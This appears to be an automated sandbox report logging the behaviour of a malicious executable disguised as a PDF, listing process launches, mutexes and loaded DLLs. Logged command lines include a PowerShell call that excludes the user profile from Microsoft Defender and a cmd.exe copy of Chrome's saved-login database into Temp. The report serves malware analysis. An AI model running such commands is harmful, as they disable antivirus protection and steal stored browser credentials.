Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5376:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6928:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6996:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2720:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5lxxqwri.2qj.ps1

Jump to behavior

Source: 101 2043 5770 pdf.exe

Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 45.39%

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: ipconfig.exe, 00000009.00000003.2325922951.0000000000D1C000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000002.4579575870.0000000000D1C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000003.2216446501.000000000273B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.2216846403.00000000026A5000.00000004.00001000.00020000.00000000.sdmp, DB1.11.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: 101 2043 5770 pdf.exe	ReversingLabs: Detection: 31%
Source: 101 2043 5770 pdf.exe	Virustotal: Detection: 16%

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe

File read: C:\Users\user\Desktop\101 2043 5770 pdf.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\101 2043 5770 pdf.exe "C:\Users\user\Desktop\101 2043 5770 pdf.exe"
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Process created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\SysWOW64\ipconfig.exe"
Source: C:\Windows\SysWOW64\ipconfig.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\101 2043 5770 pdf.exe "C:\Users\user\101 2043 5770 pdf.exe"
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\calc.exe "C:\Windows\System32\calc.exe"
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\regedit.exe "C:\Windows\regedit.exe"
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe"
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmmon32.exe "C:\Windows\SysWOW64\cmmon32.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\101 2043 5770 pdf.exe "C:\Users\user\101 2043 5770 pdf.exe"
Source: C:\Windows\SysWOW64\ipconfig.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Process created: C:\Windows\SysWOW64\raserver.exe "C:\Windows\SysWOW64\raserver.exe"
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Process created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\SysWOW64\ipconfig.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\101 2043 5770 pdf.exe "C:\Users\user\101 2043 5770 pdf.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\101 2043 5770 pdf.exe "C:\Users\user\101 2043 5770 pdf.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\calc.exe "C:\Windows\System32\calc.exe"	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\regedit.exe "C:\Windows\regedit.exe"	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe"	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe"	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Process created: C:\Windows\SysWOW64\raserver.exe "C:\Windows\SysWOW64\raserver.exe"

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: icu.dll	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.schema.shell.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.internal.shell.broker.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: icu.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\cmmon32.exe	Section loaded: cmutil.dll
Source: C:\Windows\SysWOW64\cmmon32.exe	Section loaded: version.dll
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: wldp.dll
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: profapi.dll
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: icu.dll
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: propsys.dll
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: edputil.dll
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: urlmon.dll
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: iertutil.dll
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: srvcli.dll
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: netutils.dll
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: sspicli.dll
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: wintypes.dll
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: appresolver.dll
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: slc.dll
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: userenv.dll
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: sppc.dll
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
